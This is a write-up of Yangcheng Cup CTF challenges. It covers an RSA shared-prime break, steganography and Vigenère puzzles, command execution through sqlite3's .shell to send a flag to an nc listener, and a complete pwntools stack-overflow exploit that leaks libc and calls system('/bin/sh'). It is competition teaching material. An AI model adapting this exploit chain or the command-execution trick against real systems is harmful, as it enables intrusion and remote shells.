Yangcheng Cup CTF Challenge Write-ups

admin, September 5, 2022, 21:29:55

This article comes from the 白帽子社区 (White Hat Community) Knowledge Planet.



01

Crypto

easyrsa

Challenge

from flag import flag
from Crypto.Util.number import *

m = bytes_to_long(flag)
e = 65537
f = open("output.txt", "r")
a = f.readlines()
# Each line of output.txt is used as a modulus n; the result of one
# round is the input to the next round.
for i in a:
    n = int(i)
    c = pow(m, e, n)
    m = c
print('c = %s' % (m))
f.close()

'''
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
'''

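Analysis

1. Each number in the output file is used as the modulus n in one round of the computation, and the result of that round is carried into the next round.

2. Looking at the numbers in the output file and computing their GCD yields a common factor p. With p known, q can be factored out of each modulus, and c can then be computed.


Solution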

import gmpy2
from Crypto.Util.number import *

a = 65439077968397540989065489337415940784529269429684649365065378651353483030304843439003949649543376311871845618819107350646437252980144978447924976470943930075812834237368425374578215977641265884859875440799334807607478705932175148673160353577875890074101393042506714001617338265284910381849259298772642190619
b = 86843235426823545017422014398916780909062053456790256392304973548517489132984667679637386416948409930796162377844525829968317585749956057149930523547463230147376192820753802868362225137830225967953826475779047454555958271846035526319036389127587352017149417549187850782892924691511398536178090031958365483499
c = 57839320383142814687522363258949714784622321678585619281948174372461045134361003939684803510572969567182690634502610963365500727981041136988638273942465134797850643121827808482673619534240872593224537996099454035648829692386918230535360101064254854063175494150147494342652670585674593236663514793256521719547
d = 52668168898129361356420333177679019946307853075463961068071790653159090226904625885080236174231665178538405547828768043706515464922611051221394704678558922339886480247663138702481349098077291584992082414494275463670330534613607852999291645500391111597009868188974671249118213040057429113174377610094956993269
e = 79875848044631194160351918105738804229446748736206976033243436373010695259945613104837645712048695514204494137005015770637421510392760763371639480133851920449252506525423837434811693638210458851990502785655738042348115385964604080872180121543147063180945532713593712726527002909054818485584237993215139630243
f = 73100501797447180147684637554796375398455002202770022931512541062214916136294604754404667725341796896161398464327153718845280194035978972665664657052946003418121755545770123205426883869361411412259838522099085901563107814985172942977520233320215882707710717870398128412272218474014381169303848087621856187879
g = 89149546555397759430343098936690138982544367561661914051499112345535238108800665531588376806546499374457634397161670140520060064963391826220177798442707381640723248034061313974522233415815795656570220902974484865176728535660627712374835329967608728216749734529761431592345816592875807318876347151421393671763
h = 66449107450661172442868032153863675098235855689218695279414435182923510356012957155941548483160873271040452368644926703812707864779900715051152673705082002761445847561495295455460041902473282731259268870375921215589157288622757488879539441498396276257589120302991242300378364101246448094955634459779361686643
i = 79694880331320743031437708811856697413105291652061062223857313580221562305807771003185061831752133665835648647560103986928466217390444724672894866216636981793418219455653595717274553950715056120806463449033181486699963584346517910081706586345546292894426402568226579894766693070066214488743160957135286739213
j = 70521001788476157145543175674209083194325853388116385624440232036679708917857095748070597575068955423165296665429648694541353249787337464272095260410717659726012806836884799476995758902361678737968193674368688353935424186389207123637734230550266810766585903134004322848985320790788169777840924595645463787189
k = 51801430118171456966246071852561156183140136541960623661080056673664466785669585092926482194691254461430866302262960624015915371927788809661387318097968209364907625599562339722700041444342116899266802018340155635959614677597708758012024981583143521259152639480003228924151971208695043251548758407218187895663
l = 87310111118839703578797261862424304499548882114635944516216618095145194843718635007052242072452831460162126955481326379219639313067967998826898344673513019946299427614605216960081461930080199023399060417820769438661351988322185620598552697590115678078498754112860310272842870106790357443602405008865116282919

# The moduli share a prime factor; their GCD is p.
print(gmpy2.gcd(a,b,c,d,e,f,g,h,i,j,k,l))

e = 65537

def slov(n, c):
    # p is the GCD printed above; every modulus is p * q.
    p = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
    q = n // p
    phi = gmpy2.mul((p-1), (q-1))
    d = gmpy2.invert(e, phi)
    m = gmpy2.powmod(c, d, n)
    return m

tmp = []
with open('output.txt', 'r') as f1:
    for i in f1:
        tmp.append(i)
# Decrypt in the reverse of the encryption order.
tmp = tmp[::-1]

c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
for i in tmp:
    c = slov(int(i), c)
print(long_to_bytes(c))

Result

7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
b'GWHT{gixkJl7SJTcpLOL9zqwo}'
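
The same idea on constructed toy numbers, as an added example that is not part of the original write-up: every modulus reuses one prime, so a single GCD factors them all and the chain can be undone in reverse order. The primes, the sample message and the function names are assumptions made for the demo.

```python
from functools import reduce
from math import gcd

E = 65537
# Constructed toy parameters (Mersenne primes, far too small for real use).
# Every modulus reuses the same prime P, which is the flaw being shown.
P = 2**61 - 1
MODULI = [P * q for q in (2**89 - 1, 2**107 - 1, 2**127 - 1)]


def chain_encrypt(m, moduli, e=E):
    """Encrypt m under each modulus in turn, as the challenge script does."""
    for n in moduli:
        if m >= n:
            raise ValueError("value must be smaller than the next modulus")
        m = pow(m, e, n)
    return m


def shared_prime(moduli):
    """Return the factor common to all moduli, or raise if there is none."""
    p = reduce(gcd, moduli)
    if p == 1 or p in moduli:
        raise ValueError("moduli do not share a proper common factor")
    return p


def chain_decrypt(c, moduli, e=E):
    """Undo chain_encrypt by factoring each n = p * q with the shared p."""
    p = shared_prime(moduli)
    for n in reversed(moduli):
        q = n // p
        d = pow(e, -1, (p - 1) * (q - 1))  # private exponent for this round
        c = pow(c, d, n)
    return c


if __name__ == "__main__":
    msg = int.from_bytes(b"flag{demo}", "big")  # constructed sample message
    ct = chain_encrypt(msg, MODULI)
    print(shared_prime(MODULI) == P)
    print(chain_decrypt(ct, MODULI).to_bytes(10, "big"))
```

The toy moduli are listed in ascending order so that each intermediate ciphertext is smaller than the next modulus, which is what makes every round invertible.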


02

Misc

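迷失幻境 (Lost Illusion)

Load the attachment in DiskGenius. The 迷失幻境 directory contains many images; extract them all.

The images with numeric file names are all identical.

The recycle bin inside the attached vmdk image contains some files.

Extract those as well.

Among them, $RE4UUGI.jpg displays the same content as 哒哒哒.jpg in the 迷失幻境 directory. Viewing it in Stegsolve shows that $RE4UUGI.jpg contains hidden data.

Opening $RJ3JGVF in 010 Editor shows that it is the body of a PNG file with the file header missing.

Restoring the file header yields an image that looks the same as 幻境.

Viewing it in Stegsolve reveals the key.

Then run outguess on $RE4UUGI.jpg to extract the flag file.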
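
The header-restoration step above can be scripted and checked instead of done by hand in a hex editor. This is an added example, not part of the original write-up; it assumes only the 8-byte PNG signature is missing (the write-up does not say how many bytes were cut), and the sample image and function names are constructed for the demo.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

def make_chunk(ctype, body):
    """Build one chunk: length, type, data, CRC-32 over type + data."""
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def restore_signature(data):
    """Prepend the signature when the data starts directly at the IHDR chunk."""
    if data.startswith(PNG_SIGNATURE):
        return data
    if data[4:8] != b"IHDR":
        raise ValueError("data does not begin with an IHDR chunk")
    return PNG_SIGNATURE + data

def walk_chunks(png):
    """Return [(chunk_type, crc_ok), ...] to sanity-check a repaired file."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("missing PNG signature")
    chunks, pos = [], len(PNG_SIGNATURE)
    while pos < len(png):
        if pos + 12 > len(png):
            raise ValueError("truncated chunk header")
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        end = pos + 12 + length
        if end > len(png):
            raise ValueError("truncated chunk body")
        ctype, body = png[pos + 4:pos + 8], png[pos + 8:end - 4]
        (crc,) = struct.unpack(">I", png[end - 4:end])
        chunks.append((ctype.decode("latin-1"), crc == zlib.crc32(ctype + body)))
        pos = end
        if ctype == b"IEND":
            break
    return chunks

# Constructed sample: a 1x1 RGB PNG, and the same bytes with the header cut off.
SAMPLE = PNG_SIGNATURE + b"".join([
    make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)),
    make_chunk(b"IDAT", zlib.compress(b"\x00\xff\x00\x00")),
    make_chunk(b"IEND", b""),
])
HEADERLESS = SAMPLE[len(PNG_SIGNATURE):]

if __name__ == "__main__":
    print(walk_chunks(restore_signature(HEADERLESS)))
```

A failed CRC or a truncated chunk after the repair means more than the signature was removed and the remaining bytes need a closer look.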



where_is_secret

Opening the attachment gives an archive and a text file.

The text file contains:

Naseu bybkjkl, O wt mna Wkkopwkja hl Qrkgeux Fasxtorr. Zdl Kaozbgj hksu oty fblz hhntyoxj wu tzphvq ku Nqnhbta, hgj pox Qupo geyiuna ago ixkj jhtpyhrhlw hu aak Nblyehg gntr. Nahkj pvwgu pl QBJ Vxwgr Zdbkyzhr, O jlxj ovfkkux zk ikojn fk 29.94 bpgmay-layrbtc vkocpggh jaoyrxt wz kgpphto uhc. Soxt E yxvas mna Ynyoptt wyfe, E dbrh pgbeax ekb mu yvfk pv Nqnhbta ah ha aak rpvk lyxyekxtp.aak lhlysvkj ez ZCDA@K1tz0frjo

This looks like a Vigenère cipher, so brute-force it with an online tool:

This gives the password: GWHT@R1nd0yyds
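
What the online solver found can be cross-checked from values on this page: subtracting the recovered password from the ciphertext tail gives the repeating key letters, and the correct rotation is the one that turns the opening words into English. This is an added example, not part of the original write-up; the function names are hypothetical and the key is derived here, not quoted from the page.

```python
import string

ALPHA = string.ascii_lowercase


def keystream(ciphertext, plaintext):
    """Key letters implied by an aligned ciphertext/plaintext pair."""
    return "".join(
        ALPHA[(ALPHA.index(c.lower()) - ALPHA.index(p.lower())) % 26].upper()
        for c, p in zip(ciphertext, plaintext)
        if c.isalpha()  # digits and punctuation pass through unencrypted
    )


def shortest_period(ks):
    """Smallest repeating unit that regenerates the whole keystream."""
    for n in range(1, len(ks) + 1):
        if all(ks[i] == ks[i % n] for i in range(len(ks))):
            return ks[:n]


def rotations(unit):
    """All cyclic shifts of the key unit (the tail starts mid-key)."""
    return [unit[i:] + unit[:i] for i in range(len(unit))]


def decrypt(ciphertext, key):
    """Vigenere decryption; the key advances on letters only, case is kept."""
    out, k = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            shift = ALPHA.index(key[k % len(key)].lower())
            plain = ALPHA[(ALPHA.index(ch.lower()) - shift) % 26]
            out.append(plain.upper() if ch.isupper() else plain)
            k += 1
        else:
            out.append(ch)
    return "".join(out)


# Values taken from the write-up: ciphertext tail, recovered password, opening.
CT_TAIL, PASSWORD, OPENING = "ZCDA@K1tz0frjo", "GWHT@R1nd0yyds", "Naseu bybkjkl"

if __name__ == "__main__":
    unit = shortest_period(keystream(CT_TAIL, PASSWORD))
    for key in rotations(unit):
        print(key, "->", decrypt(OPENING, key))
```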

Extracting the archive gives an image.

According to the official hint:

from PIL import Image
import math


def encode(text):
    str_len = len(text)
    width = math.ceil(str_len ** 0.5)
    im = Image.new("RGB", (width, width), 0x0)

    x, y = 0, 0
    for i in text:
        index = ord(i)
        rgb = (0, (index & 0xFF00) >> 8, index & 0xFF)
        im.putpixel((x, y), rgb)
        if x == width - 1:
            x = 0
            y += 1
        else:
            x += 1
    return im


if __name__ == '__main__':
    with open("829962.txt", encoding="gbk") as f:
        all_text = f.read()

    im = encode(all_text)
    im.save("out.bmp")

Reverse the script, paying attention to which color channel holds which part of the value, and you get an article.

import string
from PIL import Image

im = Image.open('out.bmp')
width = im.size[0]
r = ''
for y in range(width):
    for x in range(width):
        t = im.getpixel((x, y))
        # G holds the high byte and B the low byte of the code point.
        m = (t[1] << 8) + t[2]
        r += (chr(m))
print(r)
# Print only the characters that can belong to a flag; blank out the rest.
for i in range(len(r)):
    if r[i] in string.ascii_letters + '0123456789{-_}':
        print(r[i], end='')
    else:
        print(' ', end='')

Some English letters turn up inside the article.

Piece them together by hand to get the flag.

flag{h1d3_1n_th3_p1ctur3}


03

PWN

YCBSQL-v4

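After getting the challenge, load the sqlite3 binary into IDA.

1. It checks environment variables.

2. It then performs some initialization checks.

After that, a loop inspects the arguments we supplied and performs the corresponding operations.

When running it locally, entering .help shows the command help.

Further down there is a .shell command that appears to execute commands.

That suggests entering it in the .sql file.

Then listen with nc on the server.

The flag is sent over successfully.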

FakeNoOutput-v2

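After getting the challenge, load fakeNoOutput into IDA.

The program implements a simple HTTP parser.

The program first initializes, then fills s with zeros.

It reads input into s with fgets; if the read fails, it calls the response function with 400.

The Responce function produces the HTTP response body.

The Init function sets up buffering, writes 0x110 zero bytes into s2, and then writes a random value into it.

What follows sets the corresponding variables from the relevant HTTP fields.

Here, if sub_80497C4 returns true, execution enters sub_8049E63.

Look at the upload function inside that function.

Here strcpy copies data onto the stack, and haystack is under our control, so there is a stack overflow. Note that strcpy stops at a 00 byte.

There is a while loop before it; once we break out of that loop and fall through, we reach the strcpy call, so we add a filename= to the content.

The preceding Content-Length sets size.

At the Responce 200 path, an address can be passed in to leak libc.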

from pwn import *
from time import sleep

context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'

# libc = ELF("./libc.so.6")
sh = process('./fakeNoOutput')
# sh = remote('tcp.dasc.buuoj.cn', 27898)
elf = ELF('./fakeNoOutput')
libc = elf.libc

ru = lambda x, drop=False: sh.recvuntil(x, drop)
sn = lambda x: sh.send(x)
rl = lambda: sh.recvline()
sl = lambda x: sh.sendline(x)
rv = lambda x: sh.recv(x)
sa = lambda a, b: sh.sendafter(a, b)
sla = lambda a, b: sh.sendlineafter(a, b)

strspn_got = elf.got["__libc_start_main"]
res200 = 0x080496A1
main_addr = 0x80492e0
bss = 0x0805D3C0

# Request headers; Content carries filename= so that parsing reaches strcpy.
payload0 = b"""get /upload head
HTTP_SERVER1_token:\taaaa
User-Agent:\tcccc
Cookie:\tdddd
Referer:\teeee
Content-Length:\t5600\r\n
Content:filename="""
payload0 += b'a' * 600

gdb.attach(sh, 'b *0x8049FEC')
pause()

sl(payload0)

# First pass: use the Responce 200 path to leak a libc address, then return to main.
payload = b"A" * 4164 + p32(res200)
payload += p32(main_addr)
payload += p32(strspn_got)
payload = payload.ljust((5000-18), b"B")
sn(payload)
res = ru(b"\xf7")
libc_start_main = u32(res[-4:])

log.info("----------------------" + hex(libc_start_main))

libcbase = libc_start_main - libc.sym["__libc_start_main"]
system_libc = libcbase + libc.sym["system"]
gets_libc = libcbase + libc.sym["gets"]
log.info("----------------------" + hex(libcbase))
log.info("----------------------" + hex(gets_libc))

sl(payload0)

# Second pass: same overflow, now with the libc addresses computed from the leak.
payload = b"A" * 4164 + p32(gets_libc)
payload += p32(0x08049539)
payload += p32(bss)
payload += p32(system_libc)
payload += p32(0xbeefbeef)
payload += p32(bss)
payload = payload.ljust((5000-18), b"B")
sn(payload)

sleep(5)
sl(b"/bin/sh\x00")
sh.interactive()


Originally published on the WeChat official account 白帽子社区 (White Hat Community): Yangcheng Cup CTF Challenge Write-ups
